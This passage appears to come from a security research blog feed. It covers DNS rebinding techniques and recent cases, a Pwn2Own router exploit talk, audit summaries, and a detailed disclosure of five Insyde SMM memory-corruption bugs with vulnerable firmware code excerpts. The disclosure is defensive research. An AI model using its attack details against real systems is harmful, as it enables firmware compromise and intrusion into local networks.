Notice that the DNS name (S-35.185.206.165-127.0.0.1-1672656847789-Rr-e.d.ReBInD.IT) is randomly capitalized (i.e. ReBInD.IT instead of rebind.it). This caused issues with the query parsing functionality. Singularity expects the initial s- as the start of the query and the trailing -e as the end (see the Singularity DNS query documentation). With randomized capitalization, Singularity was unable to correctly parse the query.

The reason for the random capitalization was the introduction of the IETF draft Use of Bit 0x20 in DNS Labels to Improve Transaction Identity. In January 2023, Google started deploying this feature in certain regions. The goal of Bit 0x20 is to make cache poisoning attacks less effective by using the capitalization to expand the range of possibilities of the 16-bit transaction ID in DNS queries.

We improved the reliability of DNS rebinding attacks in Singularity by lowercasing all incoming DNS queries to ensure consistent processing.

Recent DNS Rebinding Vulnerabilities

Security researchers keep discovering DNS rebinding vulnerabilities showing that these issues are still dangerous and exploitable. The following is a list of products that were discovered to be vulnerable to DNS rebinding in the year 2022:

– 2022-01-17 DNS rebinding vulnerability in H2 Console. This vulnerability was discovered by NCC Group and we wrote a payload to exploit this issue with Singularity.

– 2022-07-10 DNS rebinding vulnerability in Node.js (CVE-2022-32212).

– 2022-09-05 WordPress Unauthenticated Blind SSRF Via DNS Rebinding Vulnerability (CVE-2022-3590).

– 2022-11-22 SSRF via DNS Rebinding in Appsmith (CVE-2022-4096).

– 2022-11-22 RCE in Tailscale, DNS Rebinding, and You (CVE-2022-41924): The detailed write-up includes usage of our public Singularity Server, see “How to Create Manual DNS Requests to Singularity of Origin“.

Miscellaneous

Headless Chrome behaves the same as the desktop browser and the 0.0.0.0 IP address can be used to target services listening on the localhost to bypass local network access. Headless Chrome is commonly used for backend operations and can be exploited through Server-Side Request Forgery (SSRF) in many applications.

On the mobile side, DNS rebinding attacks on iOS using Safari still work reliably and fast. Attacks targeting services on the localhost can be exploited in 3 seconds (using 0.0.0.0 and the multiple answers (MA) strategy) and in less than 20 seconds for all other IP addresses (using DNS cache flooding). On Android, the mobile Chrome browser includes the same limiting factors as Chrome on desktop described above.

Conclusion

While Local Network Access makes it harder, it is still possible to execute DNS rebinding attacks. Local Network Access breaks fetch() based HTTP port scanners. Singularity’s port scanner (using Chrome) now only reports DNS rebindable HTTP services. However, it is still feasible to enumerate all (non-rebindable and rebindable) HTTP services through the use of timing side channel leaks. Common browsers have fixed the WebRTC private IP address leak, which makes it more challenging to effectively perform DNS rebinding attacks, as attackers now have to guess or know private IP address ranges.

Author

Roger Meyer (@sanktjodel)

Acknowledgments

The author would like to thank Dave Goldsmith and Gérald Doussot for their thorough and insightful reviews.

Machine Learning 103: Exploring LLM Code Generation

25 April 2023 at 01:01

This executable blog post is the third in a series related to machine learning and explores code generation from a 16 billion parameter large language model (LLM). After a brief look under the hood at the LLM structure and parameter allocation, we generate a variety of Python functions and make observations related to code quality and security. Similar to OpenAI’s ChatGPT, Google’s Bard, Meta’s LLaMa and GitHub’s Copilot, we will see some fantastic capabilities and a few intriguing misses. The results demonstrate that human expertise remains crucial, whether it be in engineering the prompt or in evaluating the generated code for suitability.

The Jupyter-based notebook can be found here

HITBAMS – Your Not so “Home” Office – Soho Hacking at Pwn2Own

24 April 2023 at 08:31

Alex Plaskett and McCaulay Hudson presented this talk at HITB AMS on the 20th April 2023. The talk showcased NCC Exploit Development Group (EDG) in Pwn2Own 2022 Toronto targeting all consumer routers (Netgear, TP-Link and Synology) from both a LAN and WAN perspective.  The talk also described how we compromised a small business device (Ubiquiti) via the WAN and used that to pivot to attack a device on the LAN (a printer). In total we created 7 different exploit chains and found many more vulnerabilities within the process. The full abstract can be read below. 

Slides

The slides for the talk can be downloaded here:

Demos

TP-Link LAN – meshyjson

Netgear WAN – pukungfu

Netgear LAN – smellycap

Synology WAN – dominate

Synology LAN – forgetme

Soho Smash-Up – Ubiquiti EdgeRouter + Lexmark Printer

 

Abstract

There has been a huge shift towards home working within the last couple of years. With this comes the security challenges of enterprises finding that their security perimeter has moved to the home office.  In the last 6 months NCC Exploit Development Group (EDG) participated in Pwn2Own 2022 Toronto targeting all consumer routers (Netgear, TP-Link and Synology) from both a LAN and WAN perspective.  We also compromised a small business device (Ubiquiti) via WAN and used that to pivot to attack a device on the LAN (a printer). In total we created 7 different exploit chains and found many more vulnerabilities within the process!

In the first section of the talk, we will describe how we approached rapidly finding vulnerabilities within multiple devices and what methodology was used. It will show how we investigated the devices both statically and dynamically in order to find vulnerabilities and vulnerability patterns which could affect other devices in scope.  We will discuss in this section how the approach varied between looking at devices via the WAN and LAN and the differences between their attack surfaces. We will also showcase custom tooling we developed for this process in order to identify low hanging fruit and speed up this analysis.

The next section of the talk we will cover the vulnerabilities we found. Specifically, we will describe multiple vulnerabilities within Netgear, TP-Link and Synology, from both LAN and WAN perspectives.

We will then discuss exploiting a number of these issues and highlight some of the unique challenges which Pwn2Own competition introduced which would not necessarily affect a real-world attacker (such as time constraints and worrying about collisions).

Finally, we will describe how we built multiple multi-stage exploit chains which were used to first compromise a router via the WAN and then pivot to compromise a device on a LAN. There were several unique challenges and design choices to be made with this due to the different architectures used and the need to engineer a reliable exploit.

We show how we developed these multiple WAN chains with different devices and then how they were combined with a second stage to compromise a printer on the LAN and the challenges which we encountered chaining together multiple targets.   

Finally, we will highlight where the security protections in all the consumer devices we targeted were lacking and what this means to end users and enterprises.

We will demo several vulnerabilities and highlight where real threat actors could use these types of attacks for lateral movement through a network or maintain persistence on devices to allow access to enterprise resources. 

Blog Posts

Two blog posts were previously published on these issues:

https://research.nccgroup.com/2022/12/22/puckungfu-a-netgear-wan-command-injection/

https://research.nccgroup.com/2022/12/19/meshyjson-a-tp-link-tdpserver-json-stack-overflow/

Public Report – Kubernetes 1.24 Security Audit

By: Dave G.
17 April 2023 at 05:01

NCC Group was selected to perform a security evaluation of Kubernetes 1.24.0 release in response to Kubernetes SIG Security’s Third-Party Security Audit Request for Proposals. The testing portion of the audit took place in May and June 2022. The global project team performed a security architectural design review that resulted in the identification of findings in terms of secure design of Kubernetes. The team also performed dynamic native application pen tests, including source code and cryptographic review which found vulnerabilities in multiple components. 

Key findings included: 

  • Concerns with the administrative experience 
  • Flaws in communication between the API Server and the Kubelet which may result in an elevation of privilege 
  • Flaws in input sanitization which provide a limited authorization bypass (publicly disclosed under CVE-2022-3162

The Public Report for this review may be downloaded below.

Public Report – Solana Program Library ZK-Token Security Assessment

13 April 2023 at 16:00

In August 2022, Solana Foundation engaged NCC Group to conduct a security assessment of the ZK-Token SDK, a collection of open-source functions and types that implement the core cryptographic functionalities of the Solana Program Library (SPL) Confidential Token extension. These functionalities are homomorphic encryption and associated proofs used to demonstrate the consistency of elementary instructions that move tokens between accounts while keeping the involved amounts in an encrypted format that ensures that only the sender and recipient may learn any information about these amounts.

Stepping Insyde System Management Mode

11 April 2023 at 13:05

In October of 2022, Intel’s Alder Lake BIOS source code was leaked online. The leaked code was comprised of firmware components that originated from three sources:

  • The independent BIOS vendor (IBV) named Insyde Software,
  • Intel’s proprietary Alder Lake BIOS reference code,
  • The Tianocore EDK2 open-source UEFI reference implementation.

I obtained a copy of the leaked code and began to hunt for vulnerabilities. This writeup focuses on the vulnerabilities that I found and reported to Insyde Software. These bugs span various System Management Mode (SMM) modules, including:

  • Insyde H2O Internal Soft-SMI Interface (IHISI) dispatcher
  • Flash BIOS Through SMI (FTBS) handlers
  • BIOS Guard SMI handlers

What is System Management Mode and Why is it Interesting?

Before diving into the bug details, let’s first take a brief detour to talk about System Management Mode. SMM is a highly privileged x86 operating mode. It has a variety of purposes, including control of hardware and peripherals, handling hardware interrupts, power management, and more. SMM is sometimes referred to as “Ring -2” using the protection ring nomenclature.

x86 Protection Levels

A CPU transitions to System Management Mode when a System Management Interrupt (SMI) is issued. A SMI can be generated from hardware or from software, such as by writing to an IO port. These interrupts are high priority and are unmaskable (e.g., they can’t be ignored).

SMM executes from a protected region of memory known as System Management RAM (SMRAM). The System-Management Range Register (SMRR) can be (*ahem* should be) programmed to restrict access to the SMRAM region, preventing external agents from accessing SMRAM. In other words, the OS should not be able to read or write SMRAM to directly influence SMM execution.

SMRAM Layout

SMM execution is transparent to the operating system. While a SMI handler is executing, the so-called SMI Rendezvous procedure will cause the other CPU cores to also enter SMM and wait. The OS can’t see or inspect what SMM is doing.

But on the other hand, SMM can influence OS execution. SMM has (nearly) full access to the platform’s DRAM. I say nearly here, because there are a few exceptions, such as certain DRAM carveouts that are owned by the even-more-highly-privileged firmware IPs, like AMD’s PSP or Intel’s CSME.

Beyond near-complete access to physical memory, SMM possesses additional powerful capabilities: It has full access to the platform’s SPI flash, and it can read/write all MSRs.

For these reasons, SMM is a desirable location for attackers to implant a bootkit. Such a bootkit will be simultaneously invisible to most anti-virus software and will also be highly privileged. If you want to read more on the topic of bootkits, Alex Matrosov has done an excellent job of documenting some examples. You might also be curious to check out the SmmBackdoor project.

One of the most essential security requirements for preventing runtime exploitation of SMM is that the integrity of SMRAM must be upheld. In other words: Simply don’t do memory corruption. But as we know, this is a tall order, especially because SMM firmware is written in C, where undefined behavior runs rampant and upholding memory safety is akin to the delicate circus act of balancing several spinning plates.

So unsurprisingly, over the years there have been countless examples of memory corruption vulnerabilities in SMM. For further reading, I encourage you to check out Xeno Kovah’s catalogue of Low Level PC/Server Attacks for an impressive timeline of SMM vulnerability research (among other cool firmware security topics!).

SMM Attack Surfaces

Within SMM, individual SMI handlers are registered using the gSmst->SmiHandlerRegister() function. Each handler has a unique GUID, which is used to select the appropriate handler when the OS invokes a SMI.

Arguments can be passed to the SMI handlers via a Communication Buffer in shared memory. Strict input validation of all arguments passed to a SMI handler is paramount to preserve the property of memory safety.

Another attack surface relates to various platform resources that are shared between SMM and other agents such as the host OS, peripherals, and firmware IPs. Here, race conditions such as time-of-check-time-of-use (TOCTOU) problems are also a significant concern. Some typical examples of shared resources that are consumed by SMM include the following:

  • SPI flash (e.g., EFI variables)
  • Memory-Mapped I/O (e.g., PCIe BARs)
  • Shared physical memory regions (e.g., the SMI Comm Buffer)
  • Model Specific Registers (MSRs)

Because these resources can be shared between multiple agents of differing privilege levels, a malicious low-privilege agent could tamper with the shared data while SMM is in the midst of processing it.

Another notable vulnerability class in SMM is the confused deputy. Confused deputy problems can occur when an attacker passes a pointer argument to SMM (e.g., the Comm Buffer) but forces the buffer to overlap with SMRAM. If the SMI handler fails to validate the pointer (don’t forget nested pointers too!), it may mistakenly read or write its own address space, believing it is reading SMI input or writing SMI output. This, of course, would have the undesirable result of corrupting SMRAM.

Communication Buffer Overlap

If you want to read more on these topics, check out the “A Tour Beyond BIOS: SMM Communication” whitepaper for an in depth description of these and other vulnerability classes that relate to SMM.

Finally, I want to add that Microsoft’s “Secured-Core PC” initiative is beginning to push the industry towards stronger SMM hardening through the use of an SMM Supervisor, which effectively deprivileges and isolates SMI handlers. Though, like most defensive technologies, creative people will find ways to break it. For example, last year Ilja van Sprundel of IOActive presented some excellent research that reveals several critical vulnerabilities in Microsoft’s MM Supervisor which is part of Project Mu.

The Focus of My Research

SMI handlers typically receive input arguments via the Communication Buffer, which resides in a region of shared memory that may be statically or dynamically defined. As mentioned above, the Comm Buffer must be positioned outside of SMRAM, and it is the duty of SMM to enforce this every time a SMI is handled.

However, SMI handlers may also receive arguments through general purpose registers. So how does that work? Well, when an SMI is issued by the OS, the processor state is saved, and execution context is switched to SMM. The saved general purpose registers reside inside SMRAM within the State Save Area. All of this is necessary because when a SMI handler completes, CPU state must be restored so that execution control can be returned to the caller.

High Level SMI Flow (from ABC to XYZ of SMM Drivers)

Of course, a malicious or compromised host OS could place any values in these registers prior to invoking the SMI. Per SMM’s threat model, the OS is completely untrusted, so the SMI handlers must be extremely cautious to validate all data that is read from the Save State Area.

For my research, I focused on the Insyde H2O (Hardware-2-Operating System) UEFI BIOS, which exposes an SMI interface named IHISI (Insyde H2O Internal Soft-SMI Interface). This interface is made up of many sub-commands which read and write these saved state registers, treating them as arguments to the sub-command handlers.

Let’s dive into the bug details!

Vulnerability Details

All these vulnerabilities share a common root cause (insufficient input validation) and a common impact (SMRAM corruption). Their details are summarized in the following table:

#TitleCVEInsydeCVSS
1IhisiServicesSmm: Save State Register Not Checked Before UseCVE-2023-22616SA-20230226.4
2IhisiServicesSmm: Memory Corruption in FTBS SMI HandlerCVE-2023-22612SA-20230198.1
3IhisiServicesSmm: IHISI Subfunction Execution May Corrupt SMRAM.CVE-2023-22615SA-20230216.4
4IhisiServicesSmm: Write To Attacker Controlled AddressCVE-2023-22613SA-20230237.3
5ChipsetSvcSmm: Insufficient Input Validation In BIOS Guard UpdatesCVE-2023-22614SA-20230207.9

These issues were fixed in the Insyde release which occurred on April 10th 2023. They impact several different Insyde platforms, spanning Intel and AMD mobile and server devices. The specific platforms and versions can be found in the Insyde advisories, linked above.

Bug 1. IhisiServicesSmm: Save State Register Not Checked Before Use

The following SMI handler is an IHISI sub-function that is associated with Insyde’s Flash BIOS Through SMI (FTBS) functionality. The handler reads a structure pointer named BiosRomMap from RDI in the Save State Area.

EFI_STATUS EFIAPI FbtsGetWholeBiosRomMap ( VOID )
{
  UINTN                                 RomMapSize;
  UINTN                                 NumberOfRegions;
  FBTS_INTERNAL_BIOS_ROM_MAP           *BiosRomMap;
  UINTN                                 Indxe;

  NumberOfRegions = 0;
  BiosRomMap  = (FBTS_INTERNAL_BIOS_ROM_MAP *) (UINTN)
                    mH2OIhisi->ReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RDI);
  ...

This pointer is not validated before it is dereferenced for both read and write operations. A confused deputy vulnerability arises when the caller forces RDI to point to SMRAM. This effectively coerces SMM into mistakenly accessing its own private memory space.

Next, the BiosRomMap array is walked to count the NumberOfRegions, which influences the for-loop sentinel condition, potentially allowing Indxe (sic) to accumulate to a large integer value. Together, these missing input validation problems may allow an attacker to corrupt SMRAM on the lines below:

  ...
  while (BiosRomMap[NumberOfRegions].Type != FbtsRomMapEos) {
    NumberOfRegions++;
  }
  NumberOfRegions++;

  RomMapSize = NumberOfRegions * sizeof (FBTS_INTERNAL_BIOS_ROM_MAP);
  for (Indxe = 0; Indxe < (NumberOfRegions - 1); Indxe++) {
    BiosRomMap[Indxe].Address =  BiosRomMap[Indxe].Address 
                                 - PcdGet32(PcdFlashAreaBaseAddress) 
                                 + PcdGet32(PcdFlashPartBaseAddress);
  }
  ...

Finally, before returning, the saved RDI register is used to copy the updated BiosRomMap back to the caller who invoked the SMI handler.

  ...
  CopyMem ((VOID *)(UINTN)mH2OIhisi->ReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RDI),
           (VOID *)BiosRomMap, 
           RomMapSize);
  return IHISI_SUCCESS;
}

But once again, because RDI was not previously checked to prevent overlap with SMRAM, this CopyMem operation could overwrite SMRAM.

Bug 2. IhisiServicesSmm: Memory Corruption in FTBS SMI Handler

The Insyde IHISI exposes a sub-command (AH=0x48) which is handled by the following function.

The SMI handler receives attacker-controlled input through the save-state register, RSI. Below, ImageBlkPtr is tainted by the caller, and is dereferenced without checking whether it overlaps SMRAM. Additionally, the nested pointer, ImageBlock, is also dereferenced without checking for SMRAM overlap.

EFI_STATUS SecureFlashFunction ( VOID )
{
  ...
    ImageBlkPtr = (FBTS_SECURE_FLASH_IMAGE_BLOCK_STRUCTURE*)(UINTN) 
                        IhisiProtReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RSI);

    ImageBlock = ImageBlkPtr->BlockDataItem;
    ImageBase = (UINT8*)(UINTN)(ImageBlock->ImageBlockAddress);
  ...

Next, the inner-most pointer named ImageBase is finally checked to ensure it doesn’t overlap SMRAM. But when checking for overlap, the call to IhisiProtBufferInCmdBuffer() uses the ImageBlock->ImageBlockSize value, which also happens to be attacker controlled. This effectively allows this sanity check to be easily circumvented.

  ...
    if (!IhisiProtBufferInCmdBuffer ((VOID *)ImageBase, (UINTN)(ImageBlock->ImageBlockSize)))
    {
      mFlashImageInfo.RemainingImageSize = 0;
      return IHISI_BUFFER_RANGE_ERROR;
    }
  ...

Later in the SMI handler, MergeImageBlockWithoutCompress() is called. This function also reads the RSI save-stage register to get the ImageBlkPtr pointer. This time, the function does check whether the pointer overlaps SMRAM, but it does so only after dereferencing it. This dereference-then-validate pattern is most likely only an uninteresting denial of service.

EFI_STATUS MergeImageBlockWithoutCompress (
  IN EFI_PHYSICAL_ADDRESS       TargetImageAddress
  )
{
  ...
  TotalImageSize = mFlashImageInfo.TotalImageSize - mFlashImageInfo.RemainingImageSize;
  ImageBlkPtr = (FBTS_SECURE_FLASH_IMAGE_BLOCK_STRUCTURE*)(UINTN) 
                  IhisiProtReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RSI);
  ...
  NumberOfImageBlk = ImageBlkPtr->BlockNum;
  if (!IhisiProtBufferInCmdBuffer ((VOID *) ImageBlkPtr, NumberOfImageBlk)) {
    return IHISI_BUFFER_RANGE_ERROR;
  }
  ...

However, what is more interesting is the usage of the ImageBlock pointer because we know from earlier analysis that this pointer is attacker controlled. If it points into attacker-controlled memory, it is subject to TOCTOU vulnerabilities. As a result, ImageBlock->ImageBlockSize can change between the several dereferences, shown below.

  ...
  ImageBlock = ImageBlkPtr->BlockDataItem;
  ...
  Destination = (UINT8 *) (UINTN) (TargetImageAddress + TotalImageSize);
  for (Index = 0; Index < NumberOfImageBlk; Index++) {
    if (!FeaturePcdGet(PcdH2OIhisiCmdBufferSupported)   
        ImageBlock->ImageBlockSize > UTILITY_ALLOCATE_BLOCK_SIZE)
    {
      // The max block size need co-operate with utility
      return EFI_INVALID_PARAMETER;
    }   

    CopyMem ((VOID *) Destination,
             (UINT8 *)(UINTN) ImageBlock->ImageBlockAddress,
             (UINTN) ImageBlock->ImageBlockSize);
    ...
  }

If a DMA-capable attacker wins this race condition, they can modify ImageBlock->ImageBlockSize after it has been validated but before it is used in the CopyMem() call. This results in corruption of memory beyond the end of the Destination memory region.

Curiously, the Destination pointer was originally obtained from the “SecureFlashInfo” EFI variable (not shown for the sake of brevity), which is stored with the BS+RT+NV attributes, indicating that its value is also controllable by a malicious host OS.

In conclusion, this means that the attacker controls the destination address, source address and size parameters that are passed to CopyMem(). This is a powerful write-what-where memory corruption primitive.

Bug 3. IhisiServicesSmm: IHISI Subfunction Execution May Corrupt SMRAM

The following code block shows the main IHISI subfunction dispatcher. It walks a table of subfunctions, finds a registered subfunction that matches the command code, and then invokes the handler function, as shown below:

EFI_STATUS EFIAPI IhisiProtExecuteCommandByPriority (
  IN UINT32         CmdCode,
  IN UINT8          FromPriority,
  IN UINT8          ToPriority
  )
{
  EFI_STATUS                    Status;
  LIST_ENTRY                   *Link;
  IHISI_COMMAND_ENTRY          *CmdNode;
  IHISI_FUNCTION_ENTRY         *FunctionNode;

  CmdNode = IhisiFindCommandEntry (CmdCode);
  ...
  for (Link = GetFirstNode ( CmdNode->FunctionChain);
       !IsNull ( CmdNode->FunctionChain, Link);
       Link = GetNextNode ( CmdNode->FunctionChain, Link))
  {
    FunctionNode = IHISI_FUNCTION_ENTRY_FROM_LINK (Link);
    if (FunctionNode->Priority > ToPriority || FunctionNode->Priority < FromPriority) {
      continue;
    }    
    Status = FunctionNode->Function();
    ...

After the subfunction returns, and if the CmdCode is equal to OEMSFOEMExCommunication, the contents of the communication buffer will be copied back to the caller as the SMI output. The destination address for this CopyMem() operation is decided by the caller of the SMI handler because it was passed in the RCX save state register.

    ...
    if (CmdCode == OEMSFOEMExCommunication) {
      CopyMem( (AP_COMMUNICATION_DATA_TABLE*) (UINTN) 
                   IhisiProtReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RCX),
                mApCommDataBuffer,
               sizeof (AP_COMMUNICATION_DATA_TABLE) );
    }   
    ...

The problem here is that when an attacker controls the contents of RCX,  they can coerce the above code to write the mApCommDataBuffer to an attacker-controlled location in SMRAM.

In evaluating the impact of this, we must check whether each and every IHISI subfunction properly validates RCX before returning to the dispatcher. The relevant subfunctions that are associated with the OEMSFOEMExCommunication command code are listed below:

STATIC IHISI_REGISTER_TABLE OEM_EXT_COMMON_REGISTER_TABLE[] = {
  { OEMSFOEMExCommunication, "S41Kn_CommuSaveRegs", KernelCommunicationSaveRegs             },
  { OEMSFOEMExCommunication, "S41Cs_ExtDataCommun", ChipsetOemExtraDataCommunication        },
  { OEMSFOEMExCommunication, "S41OemT01Vbios00000", OemIhisiS41T1Vbios                      },
  { OEMSFOEMExCommunication, "S41OemT54LogoUpdate", OemIhisiS41T54LogoUpdate                },
  { OEMSFOEMExCommunication, "S41OemT55CheckSignB", OemIhisiS41T55CheckBiosSignBySystemBios },
  { OEMSFOEMExCommunication, "S41OemReservedFun00", OemIhisiS41ReservedFunction             },
  { OEMSFOEMExCommunication, "S41Kn_T51EcIdelTrue", KernelT51EcIdelTrue                     },
  { OEMSFOEMExCommunication, "S41Kn_ExtDataCommun", KernelOemExtraDataCommunication         },
  { OEMSFOEMExCommunication, "S41Kn_T51EcIdelFals", KernelT51EcIdelFalse                    },
  { OEMSFOEMExCommunication, "S41OemT50Oa30RWFun0", OemIhisiS41T50a30ReadWrite              },
  ...

After careful inspection, we determined that most of these IHISI subfunctions perform strict validation of the pointer stored in RCX. For example, the first handler, KernelCommunicationSaveRegs() is shown below. Here, we can observe that ApCommDataBuffer (the pointer that was read from RCX) is checked to ensure that it correctly resides inside the Comm Buffer.

EFI_STATUS EFIAPI KernelCommunicationSaveRegs ( VOID )
{
  AP_COMMUNICATION_DATA_TABLE      *ApCommDataBuffer;
  UINTN                            BufferSize;

  mRomBaseAddress = 0;
  mRomSize        = 0;
  ApCommDataBuffer = (AP_COMMUNICATION_DATA_TABLE*) (UINTN) 
                       IhisiProtReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RCX);

  if (!IhisiProtBufferInCmdBuffer ((VOID *) ApCommDataBuffer, 
                                   sizeof(AP_COMMUNICATION_DATA_TABLE)))
  {
    return IHISI_BUFFER_RANGE_ERROR;
  }
  ...
  BufferSize = ApCommDataBuffer->StructureSize;
  if (BufferSize < sizeof(AP_COMMUNICATION_DATA_TABLE)) {
    BufferSize = sizeof(AP_COMMUNICATION_DATA_TABLE);
  }
  if (!IhisiProtBufferInCmdBuffer ((VOID *) ApCommDataBuffer, BufferSize)) {
    return IHISI_BUFFER_RANGE_ERROR;
  }
  ...
}

However, there are two subfunctions that do not validate RCX:

  • KernelT51EcIdelTrue()
  • KernelT51EcIdelFalse()

This oversight is most likely a consequence of the fact that these subfunctions do not use RCX, so perhaps the developer assumed it was not necessary to validate RCX. However, even though these subfunctions never use RCX, the IhisiProtExecuteCommandByPriority() dispatcher will still use RCX as the destination address for a CopyMem() operation.

Therefore, if an attacker set an address in RCX that overlapped SMRAM before invoking the S41Kn_T51EcIdelTrue or S41Kn_T51EcIdelFalse subfunctions, they could corrupt SMRAM with the contents of the AP communication buffer.

Bug 4. IhisiServicesSmm: Write To Attacker Controlled Address

The following SMI handler reads a structure pointer named OutputData from the RCX save state register, as shown below:

STATIC EFI_STATUS ReadDefaultSettingsToFactoryCopy ( VOID )
{
  OUTPUT_DATA_STRUCTURE          *OutputData;
  UINT64                         FactoryCopySize;

  OutputData = (OUTPUT_DATA_STRUCTURE *) (UINTN) 
                   IhisiProtReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RCX);
  ...

The SMI handler then performs writes to fields in this structure without validating OutputData for overlap with SMRAM.

  ...
  OutputData->BlockSize = COMMON_REGION_BLOCK_SIZE_4K;

  FactoryCopySize =  FdmGetSizeById (...); 
  ...
  if (FactoryCopySize == 0x10000) {
    OutputData->DataSize = COMMON_REGION_SIZE_64K;
  } else {
    OutputData->DataSize = COMMON_REGION_REPORT_READ_SIZE;
    OutputData->PhysicalDataSize = (UINT32) FactoryCopySize;
  }
  ...

At the risk of sounding like a broken record: Once again, this is a straightforward SMM memory corruption vulnerability.

Bug 5. ChipsetSvcSmm: Insufficient Input Validation In BIOS Guard Updates

BIOS Guard is a security feature under the Intel’s “Hardware Shield” marketing umbrella. It  hardens the BIOS flash update process by restricting access to SPI flash via the BIOS Guard ACM, which authenticates BIOS updates.  There’s little public documentation on BIOS Guard, but this talk reveals some design aspects that Alex recovered by reverse engineering. The following vulnerability affects Insyde’s SMM module which parses the BIOS Guard Update Header, whose layout is shown below:

BIOS Guard Update Structure

Below, the InputDataBuffer is read from RSI, and points to the above BIOS Guard update structure. This pointer is dereferenced to calculate the BIOS Guard certificate offset (BgupcOffset) without first checking whether the pointer overlaps SMRAM. Because ScriptSectionSize and DataSectionSize (both UINT32 types) are tainted, BgupcOffset should also be considered tainted, and can take on any 32-bit integer value.

EFI_STATUS BiosGuardUpdateWrite ( VOID )
{
  ...
  UINT32                                BgupcSize;
  UINT32                                BgupcOffset;
  UINT32                                BufferSize;
  EFI_PHYSICAL_ADDRESS                  BgupCertificate;
  UINT8                                 *InputDataBuffer;
  UINT32                                DataSize;
  ...
  
  InputDataBuffer = (UINT8*)(UINTN)mH2OIhisi->ReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RSI);
  BgupcOffset = sizeof(BGUP_HEADER) 
                   + ((BGUP *) InputDataBuffer)->BgupHeader.ScriptSectionSize 
                   + ((BGUP *) InputDataBuffer)->BgupHeader.DataSectionSize;
  ...

Next, BufferSize is read from RDI, and it is used to check whether the input buffer resides within the command buffer. However, this code is lacking strict checks to ensure that BufferSize is sufficiently large. If BufferSize happened to be smaller than the size of the BGUP_HEADER structure, then the earlier pointer dereferences (when reading members from BgupHeader) might access memory beyond the bounds of the input buffer, leading to an out-of-bounds read.

  ...
  BufferSize      =  mH2OIhisi->ReadCpuReg32 (EFI_SMM_SAVE_STATE_REGISTER_RDI);
  BgupCertificate = (EFI_PHYSICAL_ADDRESS) (mBiosGuardMemAddress 
                        + mBiosGuardMemSize
                        - BGUPC_MEMORY_OFFSET);

  if (!mH2OIhisi->BufferInCmdBuffer ((VOID *) InputDataBuffer, BufferSize)) {
    return EFI_INVALID_PARAMETER;
  }
  ...

Then, BgupcSize is checked to ensure it is consistent with BufferSize. However, this sanity check can also be bypassed because the attacker controls both sides of the conditional expression — both BgupcOffset and BufferSize.

  ...
  if ((BgupcOffset + BgupcSize) != BufferSize) {
    return EFI_INVALID_PARAMETER;
  }
  ...

The last step taken before triggering the BIOS Guard ACM is to use the attacker-controlled BgupcOffset (which can be very large) to copy the certificate and update data. This is shown below:

  ...
  ZeroMem ((VOID *)(UINT64) mBiosGuardMemAddress, mBiosGuardMemSize);
  CopyMem ((VOID *)(UINT64) mBiosGuardMemAddress, InputDataBuffer, BgupcOffset);
  CopyMem ((VOID *) BgupCertificate, InputDataBuffer + BgupcOffset, BgupcSize);
  ...

The above CopyMem() calls can lead to corruption of SMRAM when memory beyond the end of the mBiosGuardMemAddress region is overwritten.

Thanks

I would like to thank Insyde PSIRT, and in particular, Kevin Davis, for being a pleasure to work with during this disclosure period.

Disclosure Timeline

  • Nov 28, 2022: Initial contact made to Insyde’s PSIRT team.
  • Nov 28, 2022: Insyde quickly responds with disclosure instructions.
  • Dec 16, 2022: NCC Group shares the vulnerability details.
  • Dec 16, 2022: Insyde confirms receipt and explains that 90 days is their standard embargo window.
  • Dec 22, 2022: Insyde provides an update and confirms positive triage for the two bugs.
  • Dec 22, 2022: NCC Group shares details for three additional vulnerabilities.
  • Dec 22, 2022: Insyde confirms receipt.
  • Jan 4, 2023: Insyde requests embargo extension to April 10th. NCC Group agrees to the revised timeline.
  • Feb 14, 2023: Insyde confirms that fixes are on track for April 10th, but two vulnerability reports are still being investigated.
  • Mar 30, 2023: NCC Group requests an update on the April 10th target date.
  • Apr 3, 2023: NCC Group shares a draft of this publication with Insyde.
  • Apr 10, 2023: Insyde publishes their advisories.
  • Apr 11, 2023: Publication of this blog post.

Hardware & Embedded Systems: A little early effort in security can return a huge payoff

By: Rob Wood
5 April 2023 at 15:40

Editor’s note: This piece was originally published by embedded.com

There’s no shortage of companies that need help configuring devices securely, or vendors seeking to remediate vulnerabilities. But from our vantage point at NCC Group, we mostly see devices when working directly with OEMs confronting security issues in their products — and by this point, it’s usually too late to do much. We root out as many vulnerabilities as we can in the time allotted, but many security problems are already baked in. That’s why we advocate so strongly for security early in the development process.

Product Development

Product development for an embedded system has all the stages you expect to find in textbooks. While formal security assessments are most common in the quality testing phase, there is a role for security in all phases.


Figure 1: Typical product design cycle

Requirements and Threat Modelling

We see major security problems introduced even during requirements gathering. Insufficient due diligence here can cause many issues down the line. Conversely, even a little effort at this point can have a huge payoff at the end.

Security Requirements

Functional requirements tell you everything your product is supposed to do, and how. Security requirements outline all the things your product is not supposed to do, and that’s equally important. Security testing occupies this gap, and it’s a vital part of the process.


Figure 2: Testing vs. security testing

Threat Modelling

To develop your security requirements[1],[2], you need a solid understanding of the threat model. Before you can even consider appropriate security controls and mitigations, you must define the product’s security objectives, and the types of threats your product should withstand, in as much detail as possible[3]. This describes all the bad guys who want to compromise your systems and devices, as well as those of your customers and users. They come in many forms:

  • Remote attackers using a wired or wireless network interface (if the device has such capabilities). These attacks can scale easily and affect many devices at once.
  • Local attacks that require an ability to run code on the device, often as a lower privilege. Browser code or mobile apps are examples of such vectors.
  • Physical attackers with possession of the hardware. Lost or stolen devices, rogue administrators, temporary access through short-term rentals, and domestic abuse, are all common examples. This issue is harder to solve, and the best recourse is to increase the cost for the attacker. These come in two forms: cost to develop an attack, and cost to execute. Increasing the first may help buy you time, but if the product is to have any longevity in the market, it’s better to concentrate on the latter. Weaknesses such as sharing secrets across a fleet of devices is an all-too-common design pattern that leads to a near-zero execution cost (once the secret is known).

